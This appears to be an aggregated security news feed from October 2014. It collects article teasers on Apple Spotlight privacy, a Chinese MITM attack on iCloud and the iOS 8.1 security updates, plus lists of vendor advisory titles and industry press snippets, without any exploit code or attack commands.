Hackin9

Two steps toward privacy, one step back.

While privacy advocates lauded Apple for the company’s decision to default to encrypting data on its latest mobile operating system, iOS 8, the technology firm faced criticism on Monday after independent researchers discovered that its latest operating system, Mac OS X Yosemite, is configured to send location and search data whenever a user queries Spotlight.

Spotlight is the company’s search feature for Mac OS X. The capability doesn't just search a user’s computer, though; it also sends information to Apple and Microsoft to return searches from the companies’ services, according to Fix-MacOSX.com.

Read 4 remaining paragraphs | Comments

 
A screen capture shows the warning of a fake iCloud.com certificate—signed by an official Chinese certificate authority.

GreatFire.org, a group that monitors censorship by the Chinese government’s national firewall system (often referred to as the “Great Firewall”), reports that China is using the system as part of a man-in-the-middle (MITM) attack on users of Apple’s iCloud service within the country. The attacks come as Apple begins the official rollout of the iPhone 6 and 6 Plus on the Chinese mainland.

The attack, which uses a fake certificate and Domain Name Service address for the iCloud service, is affecting users nationwide in China. The GreatFire.org team speculates that the attack is an effort to help the government circumvent the improved security features of the new phones by compromising their iCloud credentials and allowing the government to gain access to cloud-stored content such as phone backups.

Chinese iCloud users attempting to log in with Firefox and Chrome browsers would have been alerted to the fraudulent certificate. However, those using Mac OS X’s built-in iCloud login or another browser may not have been aware of the rerouting, and their iCloud credentials would have been immediately compromised. Using two-step verification would prevent the hijacking of compromised accounts.

Read 1 remaining paragraphs | Comments

 
LiteCart Security Advisory - Multiple XSS Vulnerabilities - CVE-2014-7183
 
APPLE-SA-2014-10-20-2 Apple TV 7.0.1
 
APPLE-SA-2014-10-20-1 iOS 8.1
 
AST-2014-011: Asterisk Susceptibility to POODLE Vulnerability
 
[security bulletin] HPSBMU03126 rev.2 - HP Operations Manager/Operations Agent, Remote Cross-site Scripting (XSS)
 
[security bulletin] HPSBHF03146 rev.1 - HP Integrity SD2 CB900s i4 & i2 Server running Bash Shell, Remote Code Execution
 
[security bulletin] HPSBHF03145 rev.1 - HP Integrity Superdome X and HP Converged System 900 for SAP HANA running Bash Shell, Remote Code Execution
 
GNOME gnome-shell Lock Screen Local Security Bypass Vulnerability
 
Linux Kernel VFS 'pivot_root()' Function Denial of Service Vulnerability
 
Linux Kernel CVE-2014-7975 Local Denial of Service Vulnerability
 
Zend Framework CVE-2014-8088 Authentication Bypass Vulnerability
 


Apple released security update today for iOS 8 and Apple TV 7.

iOS 8.1 (APPLE-SA-2014-10-20-1 iOS 8.1) is now available for iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later, to addresses the following:

Bluetooth CVE-2014-4448
House Arrest CVE-2014-4448
iCloud Data Access CVE-2014-4449
Keyboards CVE-2014-4450
Secure Transport CVE-2014-3566

Apple TV 7.0.1 (APPLE-SA-2014-10-20-2 Apple TV 7.0.1) is now available for Apple TV 3rd generation and later, to address the following:

Bluetooth CVE-2014-4428
Secure Transport CVE-2014-3566

[1] https://support.apple.com/kb/HT1222

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

Teaching SEC 503 end of October in Ottawa

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Security in the cloud era, such as it is
FierceEnterpriseCommunications
And on-premise infosec teams find themselves acting as liaisons between their organizations and the tech support personnel for the antivirus vendors. Rather than security vendors informing them of the latest dangers, the tables have turned and the ...

and more »
 

SANS to Debut its Biggest NetWars CyberCity Challenge at CDI 2014
PR Newswire (press release)
BETHESDA, Md., Oct. 20, 2014 /PRNewswire-USNewswire/ -- SANS today announced the ultimate training event for cyber warriors and Infosec professionals as it brings together every CyberCity mission ever offered, and new missions, under one single ...

 
[security bulletin] HPSBST03129 rev.1 - HP StoreFabric B-series switches running Bash Shell, Remote Code Execution
 
[security bulletin] HPSBST03131 rev.1 - HP StoreOnce Backup Systems running Bash Shell, Remote Code Execution
 
[security bulletin] HPSBMU03144 rev.1 - HP Operation Agent Virtual Appliance, Bash Shell, Remote Code Execution
 
[security bulletin] HPSBMU03143 rev.1 - HP Virtualization Performance Viewer, Bash Shell, Remote Code Execution
 

ISPs handbagged: BLOCK knock-off sites, rules beak
Register
Arnold had to balance the EU InfoSec Directive, limiting liability for service providers, with the EU E-commerce Directive which protects trade. The latter applied to both sides in this case: giving traders the right to pursue injunctions, and service ...

 

SANS to Debut its Biggest NetWars CyberCity Challenge at CDI 2014
Virtual Press Office (press release)
BETHESDA, Md., Oct. 20, 2014 /PRNewswire-USNewswire/ -- SANS today announced the ultimate training event for cyber warriors and Infosec professionals as it brings together every CyberCity mission ever offered, and new missions, under one single ...

and more »
 

To prevent breaches, change security hierarchy and use better metrics
TechTarget
Dr. Cole was the lone inductee into the InfoSec European Hall of Fame in 2014. He is actively involved with the SANS Technology Institute (STI) and is a SANS faculty senior fellow and course author who works with students, teaches, and develops and ...

 
Microsoft Windows FAT32 Disk Partition Driver CVE-2014-4115 Local Privilege Escalation Vulnerability
 
Microsoft .NET Framework 'iriParsing' Remote Code Execution Vulnerability
 
Microsoft .NET Framework ClickOnce CVE-2014-4073 Remote Privilege Escalation Vulnerability
 
Microsoft .NET Framework CVE-2014-4122 ASLR Security Bypass Vulnerability
 
[SECURITY] [DSA 3050-1] iceweasel security update
 
Re: LiveZilla 5.3.0.7 Security Issue
 
Elastix Multiple vulnerabilities (Remote Command Execution, XSS, CSRF)
 

Security in the cloud era, such as it is
FierceEnterpriseCommunications
And on-premise infosec teams find themselves acting as liaisons between their organizations and the tech support personnel for the antivirus vendors. Rather than security vendors informing them of the latest dangers, the tables have turned and the ...

 

Authentic8 Enhances Silo for Enterprise Information Security Researchers
Dark Reading
“These enhancements for infosec researchers are a direct response to the needs of our users. Silo is a platform and we will continue to enhance and extend its capabilities.” “Our team has been using Toolbox for a while. The ability to launch a browser ...

 

White Ops Names Former RSA CISO as President and Chief Operating Officer
Dark Reading
Eddie drove defensive strategies on the demand side of the cyber security technology market as the first CISO at Nationwide Insurance, during thirteen years of government service, and for years as technical director of a key government InfoSec lab.

and more »
 

Posted by InfoSec News on Oct 20

http://www.csoonline.com/article/2835215/data-protection/hackers-strike-defense-companies-through-realtime-ad-bidding.html

By Jeremy Kirk
IDG News Service
Oct 17, 2014

A major change this year in how online advertisements are sold has been
embraced by hackers, who are using advanced ad-targeting capabilities to
precisely deliver malware.

Security vendor Invincea said it has detected many instances of people
within defense and aerospace...
 

White Ops Names Former RSA CISO as President and Chief Operating Officer
Marketwired (press release)
Eddie drove defensive strategies on the demand side of the cyber security technology market as the first CISO at Nationwide Insurance, during thirteen years of government service, and for years as technical director of a key government InfoSec lab.

and more »
 

Posted by InfoSec News on Oct 20

http://www.usatoday.com/story/life/tv/2014/10/19/hackers-on-tv/17432191/

By Ann Oldenburg
USA TODAY
October 19, 2014

Hackers are hot.

Yes, they tend to be villains in real life, making headlines for tapping
into Target to steal credit card data, breaking into the cloud to snatch
nude celebrity photos, and even breaching government firewalls to commit
all sorts of top-level cybercrimes.

But on TV? They're the new heroes.

"Hackers...
 

Posted by InfoSec News on Oct 20

***************************************************************************
***BEGIN THOTCON TRANSMISSION**********************************************

___ ___ ___ ___ ___ ___ ___
/\ \ /\__\ /\ \ /\ \ /\ \ /\ \ /\__\
\:\ \ /:/__/_ /::\ \ \:\ \ /::\ \ /::\ \ /:| _|_
/::\__\ /::\/\__\ /:/\:\__\ /::\__\ /:/\:\__\ /:/\:\__\ /::|/\__\
/:/\/__/...
 

Posted by InfoSec News on Oct 20

http://www.theregister.co.uk/2014/10/20/first_standards_to_clean_up_messy_certs/

By Darren Pauli
The Register
20 Oct 2014

The global gathering of incident responders FIRST is spearheading a global
standards effort to reform and unify the operations of government and
large enterprise computer emergency response teams (CERTs).

The Forum of Incident Response and Security Teams (FIRST) has tipped
US$500,000 into the effort and has received...
 

Posted by InfoSec News on Oct 20

http://www.china.org.cn/world/2014-10/20/content_33809960.htm

China Daily
October 20, 2014

Cyber security is an irritant to bilateral ties. On Wednesday the US
Federal Bureau of Investigation said hackers it believed were backed by
the Chinese government had launched more attacks on US companies, a charge
China rejected as unfounded.

In May, the United States charged five Chinese military officers with
hacking American firms, prompting...
 
Libxml2 Entities Expansion CVE-2014-3660 Denial of Service Vulnerability
 
Linux Kernel 'netdevice.h' NULL Pointer Dereference Denial of Service Vulnerability
 

SANS to Offer Training in Advanced Penetration Testing and Exploit Writing in ...
IT Business Net
DUBAI, United Arab Emirates, 19th October, 2014: SANS Gulf Region 2014, the region's largest InfoSec training event will be offering SANS' SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking course as part of a quartet of 6-day ...

 
Mozilla Firefox/Thunderbird CVE-2014-1585 Security Bypass Vulnerability
 
Mozilla Firefox/Thunderbird CVE-2014-1586 Security Bypass Vulnerability
 

SANS to Offer Training in Advanced Penetration Testing and Exploit Writing in ...
Zawya (registration)
DUBAI, United Arab Emirates, 19th October, 2014: SANS Gulf Region 2014, the region's largest InfoSec training event will be offering SANS' SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking course as part of a quartet of 6-day ...

 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Internet Storm Center Infocon Status